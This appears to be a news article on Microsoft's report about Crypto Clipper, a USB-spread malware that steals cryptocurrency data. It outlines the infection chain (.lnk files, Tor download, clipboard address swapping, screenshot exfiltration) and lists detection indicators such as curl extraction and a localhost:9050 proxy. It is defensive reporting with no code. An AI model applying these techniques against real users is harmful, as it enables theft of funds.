Microsoft has announced the discovery of a new self-propagating malware that aims to steal cryptocurrency data, writes Ars Technica. The threat was named Crypto Clipper.
The malware spreads via USB drives and aims to find wallets and seed phrases stored on the device’s clipboard. After detecting such data, Crypto Clipper takes five screenshots within ten seconds and sends them along with the data to servers controlled by the attackers. Microsoft believes that taking screenshots can be useful for providing additional context about user actions.
The peculiarity of this Trojan’s implementation is that it does not use a traditional installer or an open IP-based management infrastructure. Instead, a portable Tor client is used, which routes traffic through a local SOCKS5 proxy. This allows data theft to be combined with remote command execution, turning a financially motivated tool into an easy backdoor.
Microsoft specialists recorded the distribution of Crypto Clipper through .lnk files on USB drives that contain executable code. After connecting the infected drive to the computer, this code checks whether a malicious program is installed on the device. If not, it downloads it through the Tor proxy.
To disguise its presence, the Trojan scans the USB drive and renames the .lnk files with similar names. In addition, the malware replaces the found wallet addresses with those belonging to the attackers. Thus, when the user uses the desired address for the transfer, the funds are not sent to the intended account, but to the wallet of the attackers.
Microsoft Defender for Endpoint identifies Crypto Clipper components as suspicious JavaScript processes and possible data extraction using the Curl utility. Microsoft Defender Antivirus classifies the threat as Trojan:Win32/CryptoBandits.A. Among the common indicators of infection, the company cites the launch of suspicious child processes by script interpreters, the use of a proxy on localhost:9050, screen capture commands in PowerShell, and signs of clipboard checks or crypto address substitutions.
Microsoft said that this family of Trojans demonstrates how lightweight scripting tools can have a significant impact when combined with anonymized communication channels and the ability to perform tasks in real time. The use of Tor routing, targeted clipboard interception, screenshot capture, and remote command execution provide attackers with both quick ways to monetize and long-term control over infected devices.
Share:
